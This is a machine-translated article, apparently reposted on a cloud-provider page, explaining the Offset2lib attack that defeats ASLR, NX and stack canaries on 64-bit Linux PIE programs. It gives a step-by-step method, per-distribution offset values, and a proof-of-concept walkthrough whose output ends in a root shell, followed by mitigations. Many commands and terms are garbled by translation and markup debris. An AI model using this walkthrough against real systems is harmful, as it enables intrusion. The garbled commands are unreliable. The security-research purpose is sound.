Offset2lib attack how to fully bypass 64-bit Linux kernel protection [VIDEO]

Source: Internet
Author: User
Tags in python

Preface

Address space layout randomization (ASLR) can be used to prevent attacks when you know the target code or data location. Because hackers do not know the layout of the entire address space, The ASLR technology becomes extremely effective. Only when the executable program is compiled into PIE (address-independent executable files) can we maximize protection from ASLR technology, because all its components are loaded from random addresses.

However, when an executable file is compiled into PIE, the ASLR implementation in GNU/Linux may cause a security vulnerability named Offset2lib, it is used to bypass common vulnerability protection in GNU/Linux, such as ASLR.

The following details how the vulnerability was exploited. This attack can bypass common protection technologies such as: prohibit running bit (NX), address space layout randomization (ASLR), and stack overflow protection (SSP ), A remote shell can be obtained in a short time.

FreeBuf tips

Libc: the ansi c function library in Linux. Ansi c is a basic C language function library, including the most basic C language library function.
Fork server: And hairstyle server.
ROP application: the so-called Return Orientated Programming, also called ret2libc in the early stage.
Base Address: load a module and store it from an address.
Grsecurity/PaX: From the very beginning, PaX focuses on how to defend against and detect memory replica uption. Later, the Grsecurity community found that PaX is very similar to what they are concerned about, so it is merged. The attack in this article is not affected, but only Gentoo and Debian Mempo provide direct use of Grsecurity/PaX.

ASLR vulnerability

The ASLR vulnerability is only applicable to GNU/Linux systems. It is not caused by program code errors, but by design defects. Fortunately, it can be easily fixed in a 64-bit system.

This problem occurs when an application is compiled by PIE. The image of the executable file is used as a shared library and appears at random locations in the memory. The GNU/Linux algorithm for loading ASLR objects is as follows:

1. The first shared object will be loaded at random locations in the application.
2. Object loading will be continuous

Therefore, the memory address leakage determines whether the application has sufficient space to randomize the memory ING of the application. There is no need to disclose the address after initialization. You only need the process counter of the program.

The value of offset2lib is a fixed value, which may be different in each system. It depends on the library version and the sequence of library loading.

Offset2lib attack

The target of this attack is to obtain the address of the application code. The following attacks use the standard buffer overflow vulnerability to obtain the saved-IP address (application address) of the application code stored in the stack ).

We performed attacks in five steps. First, we conduct an offline analysis on the target program and its execution environment. Unknown information hidden by ASLR can be obtained through brute force, thanks to the target fork server structure. Once we obtain the complete address of the target application, the base address of the application can be calculated. The last step is to map the memory of the entire library, which is determined by the target GNU/Linux version. After obtaining hidden unknown information, it is very easy to obtain remote shell using the drop-down application. The complete online attack process may be shorter.

The attack process is summarized as follows:

1. Extract static information
2. Brute force access to the saved-IP section
3. Computing application base address
4. Calculate the constant offset2lib
5. Obtain the memory ing area

Graphic process

Step 1 (top): set the maximum 24 bits (Hardcoded). These bits are obtained offline.

Step 1 (bottom): Set 12 lower bits, which is determined by alignment (From the ELF ).

Step 2: The remaining 28-bit (Unknown) of the saved-IP is obtained from the saved-IP by the byte-for-byte attack. Only 3.5-bit (28-bit in total) must be cracked.

Step 3: By using saved-IP for computing, we can obtain the base address of the executable file:

App_base = (savedIP & 0 xFFF)-(CALLER_PAGE_OFFSET <12)
0x00007F36C6fEB000

 

Step 4: calculate the offset2lib value of the target database. The value varies depending on the system, but there is a great similarity between them. There is a quick way to obtain the value of offset2lib, that is, to execute the application locally and print out the offset. Offset2lib is not determined by the application itself. We need to customize the computing for a specific Linux system version.

Distribution Libc ver. Offset2lib
CentOS 6.5 2.12 0x5b6000
Debian 7.1 2.13 0x5ac000
Ubuntu 12.04 2.15 0x5e4000
Ubuntu 12.10 2.15 0x5e4000

Step 5: the base address of libc can be calculated by subtracting the offset2lib value from the base address of the executable file:

Libc_base = App_base-offset2lib

The attack experiment we are doing here is to demonstrate how to exploit the ASLR offset2lib vulnerability. It is foreseeable that there are still many ways to exploit this vulnerability.

Proof of Concept

Here is an experiment for you to exploit the offset2lib vulnerability. You can follow the steps to try it:

1. Obtain the offline set2lib value of the libc Library:

Download Address: get_offset2lib.tgz

2. Vulnerability server environment:

Download Address: vuln-server-64bit.tgz

3. Attack scripts written in python:

Download Address: exploit-offset2lib-ubuntu-14.04.1-LTS.py

Start the vulnerability server:

$ Tar xvf vuln-server-64bit.tgz
Server_64_PIE_SSP.c
Makefile
$ Make
Rm-f server_64_PIE_SSP
Gcc server_64_PIE_SSP.c-o server_64_PIE_SSP-m64-Wall-fPIE-pie-fstack-protector-all
$ Sudo/etc/init. d/apport stop # avoid creating cores on crashes (speed-up)
$ Sudo./server_64_PIE_SSP
Starting server on port [9999]

Obtain the offets2lib value of the target system (open a new tab ):

$ Tar xvf get_offset2lib.tgz
Makefile. offset2lib
Get_offset2lib.c
$ Make-f Makefile. offset2lib
$./Get_offset2lib
------------------------------------- ======= ---------------------------------------
---------------------------- =================================== ------------------------------
Authors: hector Marco-Gisbert <span class = "tag"> Ismael Ripoll <span class = "tag"> <iripoll <span class = "pln" >@< span class = "atn"> upv <span class = "pln">. <span class = "atn"> es <span class = "tag"> <span class = "pln">
Comment: Script to obtain the offset2lib value of this machine.
Attack: http://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html
---------------------------- =================================== ------------------------------
------------------------------------- ======= ---------------------------------------
Offset2lib (libc): 0x5f0000

Configure exp:

$ Sed-I's/(OFFSET_TO_LIBC). * =. */1 = 0x5f0000 /'
Exploit-offset2lib-ubuntu-14.04.1-LTS.py
$ Objdump-d server_64_PIE_SSP | grep-A1 vulnerable_function> $
1149: e8 82 fc ff callq dd0 <span class = "tag"> <vulnerable_function> <span class = "pln">
114e: 48 8d 45 c0 lea-0x40 (% rbp), % rax
$ Sed-I's/(PAGE_NUMBER_OF_NEXT_INSTRUCTION_TO_CALL). * =. */1 = 0x1 /'
Exploit-offset2lib-ubuntu-14.04.1-LTS.py
$ Sed-I's/(OFFSET_SAVED_RIP). * =. */1 = 0x14e /'
Exploit-offset2lib-ubuntu-14.04.1-LTS.py

Run exp:

$ Chmod a + x exploit-offset2lib-ubuntu-14.04.1-LTS.py
$./Exploit-offset2lib-ubuntu-14.04.1-LTS.py
Exploit-server_64_PIE.py-s <span class = "tag"> <server> <span class = "pln">-p <span class = "tag"> <port> <span class =" pln ">
$./Exploit-offset2lib-ubuntu-14.04.1-LTS.py-s localhost-p 9999
[+] Exploit ASLR 64 bit systems
[+] Trying to find out the canary offset
[+] Offset is 56 bytes
[+] Brute forcing stack canary
[+] SSP value is 0x60e0792a523eb900
[+] Brute forcing RBP
[+] EBP value is 0x00007fff0e79d160
[+] Brute forcing Saved RIP
[+] RIP value is 0x00007f44a19b114e
[+] Text Base at 0x00007f44a19b0000
[+] Libc Base at 0x00007f44a13c0000
[+] Getting shell...
Root @ test:/home/test # id
Id
Uid = 0 (root) gid = 0 (root) groups = 0 (root)
Root @ test:/home/test #

Suggestions for readers

Describes some solutions and application environments for vulnerabilities.

1. Use PaX patch to prevent vulnerabilities

Among the many security solutions, PaX patches from the GRSecurity community place executable files on random addresses related to other shared objects.

PaX defines the random values calculated by four variables:

Delta_exec: code segment, data segment, and bss segment
Brk: Heap
Delta_mmap: database, ing file, thread stack, shared memory
Delta_stack: User stack

The Pax solution increases the amount of information for these random values even if it can randomize non-PIE applications. It is the most advanced ASLR implementation solution we know so far. However, some people think it is too complicated as a patch. For example, it has a large number of redundant features, and some of them will damage the compatibility of some applications in the backward version.

2. Use ASLRv3 to resist the vulnerability

To avoid the offset2lib vulnerability, the executable file should be located at a random location different from the library file. We installed a patch for Linux3.18-rc7, which is implemented by four different random values. Therefore, the executable location is randomly different from the library file.

3. Use RenewSSP to prevent vulnerability exploitation

PoC can be used to successfully bypass ASLR protection by exploiting stack overflow attacks, but what hackers need to do first is bypass SSP. If SSP protection is not bypassed, this PoC will be abolished.

There is a new technology named renewSSP that can be used to brute force crack SSP. This technology is a typical SSP variation. The key ciphertext will be dynamically updated in an important position of the program, so that the ciphertext will be refreshed more frequently. The SSP value is updated when each process blocks the byte-for-byte attack. This technology does not occupy too much resources and will only be implemented during the pre-loading of shared libraries. Its overhead is almost negligible.

The following video shows how to use RenewSSP to prevent such attacks:

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.